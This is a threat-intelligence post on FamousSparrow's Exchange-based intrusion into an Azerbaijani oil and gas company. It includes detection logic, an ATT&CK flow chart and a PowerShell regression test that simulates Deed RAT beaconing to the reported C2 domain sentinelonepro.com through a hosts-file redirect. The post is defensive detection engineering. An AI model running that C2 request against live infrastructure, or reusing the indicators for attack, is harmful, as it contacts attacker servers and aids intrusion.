SOC Prime Bias: Critical

15 May 2026 12:49 UTC

FamousSparrow Targets Azerbaijan’s Oil and Gas Sector

SOC Prime Team


Summary

Bitdefender Labs identified a multi-wave intrusion targeting an Azerbaijani oil and gas company between December 2025 and February 2026. The attackers exploited the ProxyShell and ProxyNotShell chains to compromise Microsoft Exchange, then deployed the Deed RAT and Terndoor backdoors through advanced DLL sideloading techniques while repeatedly returning through the same initial access point. Bitdefender attributed the activity with moderate-to-high confidence to the China-linked APT group FamousSparrow. The campaign also showcased sophisticated evasion methods, including API hooking and staged loader activation.

Investigation

Researchers documented three distinct waves of activity. The first involved web shell deployment on Exchange, followed by delivery of Deed RAT using a service that resembled LogMeIn Hamachi. The second wave attempted to deploy Terndoor through a USOShared and driver-based chain, while the final wave returned to Deed RAT with updated configuration data. Technical analysis uncovered custom encryption, RC4 and AES-CBC decryption routines, LZNT1 and Deflate compression, and a custom PE-like header structure. The attackers later moved laterally through RDP using a domain administrator account and employed SMB tooling from the Impacket framework.

Mitigation

Organizations should patch Exchange servers without delay and remediate all known ProxyShell and ProxyNotShell exposures. Network segmentation can help reduce the impact of credential reuse and lateral movement. Defenders should also deploy behavioral detections for DLL sideloading, API hooking, and suspicious service creation. Strict controls over privileged RDP access and SMB-based remote execution tools are also recommended.

Response

Security teams should alert on creation of web shell files inside IIS directories, unexpected Windows services named LogMeIn Hamachi, and driver service registrations launched from user-writable paths. HTTPS traffic to unusual domains such as virusblocker.it.com and sentinelonepro.com should be correlated with other suspicious activity. Investigators should also examine any process that patches StartServiceCtrlDispatcherW or loads suspicious DLLs alongside legitimate binaries.
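The Response guidance above as executable triage logic, added here as an illustration and not code from the Bitdefender report or SOC Prime: three checks over Sysmon-style events (EID 11 FileCreate, EID 3 NetworkConnect) and System-log 7045 service installs, with the HTTPS-domain hit treated as a lead to correlate rather than an alert on its own. The event field names, the IIS/Exchange web roots, the user-writable path list and every sample value are assumptions constructed for the example.

```python
# Added example, not code from the Bitdefender report or SOC Prime; event shapes and
# all sample values are constructed, field names follow Sysmon / System-log 7045 usage.
WATCHED_DOMAINS = {"virusblocker.it.com", "sentinelonepro.com"}            # from the report
IIS_DIRS = ("c:\\inetpub\\wwwroot", "\\frontend\\httpproxy\\")              # assumed web roots
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")  # assumed list
WEBSHELL_EXT = (".aspx", ".ashx", ".asmx")

def is_webshell_drop(ev):
    """Sysmon EID 11 (FileCreate): server-side script written under an IIS/Exchange web root."""
    p = ev.get("TargetFilename", "").lower()
    return ev.get("EventID") == 11 and p.endswith(WEBSHELL_EXT) and any(d in p for d in IIS_DIRS)

def is_suspicious_service(ev):
    """EID 7045: Hamachi-named service outside Program Files, or a driver from a user-writable path."""
    if ev.get("EventID") != 7045:
        return False
    name, path = ev.get("ServiceName", "").lower(), ev.get("ImagePath", "").lower().lstrip('"')
    fake_hamachi = "hamachi" in name and "\\program files" not in path
    rogue_driver = ev.get("ServiceType", "").lower() == "kernel mode driver" and path.startswith(USER_WRITABLE)
    return fake_hamachi or rogue_driver

def is_c2_connect(ev):
    """Sysmon EID 3 (NetworkConnect): outbound TCP/443 to one of the reported domains."""
    host = ev.get("DestinationHostname", "").lower().rstrip(".")
    return ev.get("EventID") == 3 and ev.get("DestinationPort") == 443 and host in WATCHED_DOMAINS

CHECKS = {"webshell": is_webshell_drop, "service": is_suspicious_service, "c2_https": is_c2_connect}

def triage(events):
    """Map each host to the sorted list of indicator names that fired on it."""
    hits = {}
    for ev in events:
        for name, check in CHECKS.items():
            if check(ev):
                hits.setdefault(ev["Computer"], set()).add(name)
    return {h: sorted(s) for h, s in hits.items()}

def alerts(events):
    """Alert on any host-based hit; a C2-domain hit alone is only a lead to correlate."""
    return sorted(h for h, s in triage(events).items() if s != ["c2_https"])

SAMPLE_EVENTS = [  # constructed sample telemetry, not data from the incident
    {"EventID": 11, "Computer": "EXCH01", "TargetFilename": r"C:\inetpub\wwwroot\aspnet_client\current.aspx"},
    {"EventID": 7045, "Computer": "EXCH01", "ServiceName": "LogMeIn Hamachi",
     "ImagePath": r"C:\ProgramData\LMI\LMIGuardianSvc.exe", "ServiceType": "user mode service"},
    {"EventID": 7045, "Computer": "WS07", "ServiceName": "placeholder_drv",
     "ImagePath": r"C:\Users\Public\placeholder.sys", "ServiceType": "kernel mode driver"},
    {"EventID": 3, "Computer": "WS07", "DestinationHostname": "sentinelonepro.com", "DestinationPort": 443},
    {"EventID": 3, "Computer": "WS12", "DestinationHostname": "virusblocker.it.com", "DestinationPort": 443},
    {"EventID": 7045, "Computer": "DC01", "ServiceName": "LogMeIn Hamachi",  # genuine install, not flagged
     "ImagePath": r'"C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe" -s', "ServiceType": "user mode service"},
]
```

Running `triage(SAMPLE_EVENTS)` flags EXCH01 (service and web shell), WS07 (driver plus C2 traffic) and WS12 (C2 traffic only); `alerts(SAMPLE_EVENTS)` returns EXCH01 and WS07, leaving WS12 for correlation.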

```mermaid
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef malware fill:#ff9999
    classDef technique fill:#e0e0e0

    %% Node definitions
    initial_access["<b>Initial Access</b> – <b>T1210 Exploitation of Remote Services</b><br/><b>Technique ID</b>: T1210<br/><b>Description</b>: Exploit vulnerable remote service such as Exchange server using ProxyShell or ProxyNotShell."]
    class initial_access action
    persistence_webshell["<b>Persistence</b> – <b>T1505.003 Web Shell</b><br/><b>Technique ID</b>: T1505.003<br/><b>Description</b>: Deploy a web shell on compromised server for persistent access."]
    class persistence_webshell action
    malicious_service["<b>Persistence</b> – <b>T1569 System Services</b><br/><b>Technique ID</b>: T1569<br/><b>Description</b>: Create a malicious service masquerading as LogMeIn Hamachi for persistence."]
    class malicious_service action
    tool_logmein["<b>Tool</b> – <b>Name</b>: LogMeIn Hamachi<br/><b>Description</b>: Legitimate VPN service used as disguise."]
    class tool_logmein tool
    execution_proxy["<b>Execution</b> – <b>T1218 Signed Binary Proxy Execution</b><br/><b>Technique ID</b>: T1218<br/><b>Description</b>: Use legitimate system binary to launch malicious code."]
    class execution_proxy action
    execution_masquerade["<b>Execution</b> – <b>T1036 Masquerading</b><br/><b>Technique ID</b>: T1036<br/><b>Description</b>: Rename malicious executable as LMIGuardianSvc.exe to blend in."]
    class execution_masquerade action
    malware_lmi["<b>Malware</b> – <b>Name</b>: LMIGuardianSvc.exe<br/><b>Description</b>: Loads malicious DLL after being executed."]
    class malware_lmi malware
    defense_reflective["<b>Defense Evasion</b> – <b>T1620 Reflective Code Loading</b><br/><b>Technique ID</b>: T1620<br/><b>Description</b>: Load code into memory without touching disk."]
    class defense_reflective action
    defense_processhollow["<b>Defense Evasion</b> – <b>T1055.012 Process Hollowing</b><br/><b>Technique ID</b>: T1055.012<br/><b>Description</b>: Replace legitimate process memory with malicious code."]
    class defense_processhollow action
    defense_threadhijack["<b>Defense Evasion</b> – <b>T1055.003 Thread Hijacking</b><br/><b>Technique ID</b>: T1055.003<br/><b>Description</b>: Hijack threads of a running process."]
    class defense_threadhijack action
    defense_hide["<b>Defense Evasion</b> – <b>T1564.010 Hide Artifacts</b><br/><b>Technique ID</b>: T1564.010<br/><b>Description</b>: Conceal malicious components from detection."]
    class defense_hide action
    payload_decrypt["<b>Payload Processing</b> – <b>T1560.003 Archive Decompression</b><br/><b>Technique ID</b>: T1560.003<br/><b>Description</b>: Decrypt and decompress payload before execution."]
    class payload_decrypt action
    lateral_movement["<b>Lateral Movement</b> – <b>T1078 Valid Accounts</b><br/><b>Technique ID</b>: T1078<br/><b>Description</b>: Use stolen credentials to move laterally via RDP and SMB admin shares."]
    class lateral_movement action
    tool_impacket["<b>Tool</b> – <b>Name</b>: Impacket<br/><b>Description</b>: Python library for network protocols used to pivot."]
    class tool_impacket tool
    c2_https["<b>Command and Control</b> – <b>T1071.001 Web Protocols HTTPS</b><br/><b>Technique ID</b>: T1071.001<br/><b>Description</b>: Communicate with C2 server over encrypted HTTPS."]
    class c2_https action
    c2_contentinject["<b>Command and Control</b> – <b>T1659 Content Injection</b><br/><b>Technique ID</b>: T1659<br/><b>Description</b>: Inject malicious content into legitimate HTTP responses."]
    class c2_contentinject action
    impact_kernel["<b>Impact</b> – <b>T1014 Rootkit</b><br/><b>Technique ID</b>: T1014<br/><b>Description</b>: Attempt to install kernel driver Terndoor for deep persistence."]
    class impact_kernel action

    %% Connections
    initial_access -->|leads_to| persistence_webshell
    persistence_webshell -->|leads_to| malicious_service
    malicious_service -->|uses| tool_logmein
    malicious_service -->|leads_to| execution_proxy
    execution_proxy -->|uses| execution_masquerade
    execution_masquerade -->|loads| malware_lmi
    malware_lmi -->|performs| defense_reflective
    defense_reflective -->|performs| defense_processhollow
    defense_processhollow -->|performs| defense_threadhijack
    defense_threadhijack -->|performs| defense_hide
    defense_hide -->|enables| payload_decrypt
    payload_decrypt -->|enables| lateral_movement
    lateral_movement -->|uses| tool_impacket
    lateral_movement -->|leads_to| c2_https
    c2_https -->|uses| c2_contentinject
    c2_contentinject -->|enables| impact_kernel
```

Attack Flow

## Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:

    An adversary operating the Deed RAT wants to establish a persistent C2 channel to exfiltrate data and receive commands. Using PowerShell (T1059.001), the RAT initiates an HTTPS GET request to the hard‑coded malicious host sentinelonepro.com on port 443 (T1071.001). Because the connection is outbound, it traverses the Windows firewall and is captured by Sysmon as a NetworkConnect event. The detection rule should fire on this event.

  • Regression Test Script:

    <#
    Deed RAT C2 simulation – creates an outbound HTTPS connection
    to the known malicious host (sentinelonepro.com) on port 443.
    This script is safe for testing in an isolated lab; the domain resolves
    to a non-routable IP (127.0.0.1) to avoid contacting real C2 infrastructure.
    Writing the hosts file requires an elevated PowerShell session.
    #>

    # Override DNS resolution for safety (optional)
    $hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
    if (-not (Select-String -Path $hostsPath -Pattern "sentinelonepro.com" -SimpleMatch -Quiet)) {
        Add-Content -Path $hostsPath -Value "`n127.0.0.1 sentinelonepro.com"
    }

    # Perform the HTTPS request (simulated C2 traffic). The TLS handshake to 127.0.0.1
    # is expected to fail; Sysmon still records the outbound NetworkConnect event.
    try {
        $response = Invoke-WebRequest -Uri "https://sentinelonepro.com/heartbeat" `
                                      -UseBasicParsing `
                                      -Headers @{ "User-Agent" = "DeedRAT/1.0" } `
                                      -TimeoutSec 10
        Write-Host "C2 request completed, status code:" $response.StatusCode
    } catch {
        Write-Warning "C2 request failed (expected in isolated lab): $_"
    }

  • Cleanup Commands:

    # Remove the temporary hosts entry added by the regression test
    $hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
    (Get-Content $hostsPath) |
        Where-Object { $_ -notmatch "sentinelonepro\.com" } |
        Set-Content $hostsPath

    # Clear any residual files
    Remove-Item -Path "$env:TEMP\example.html" -ErrorAction SilentlyContinue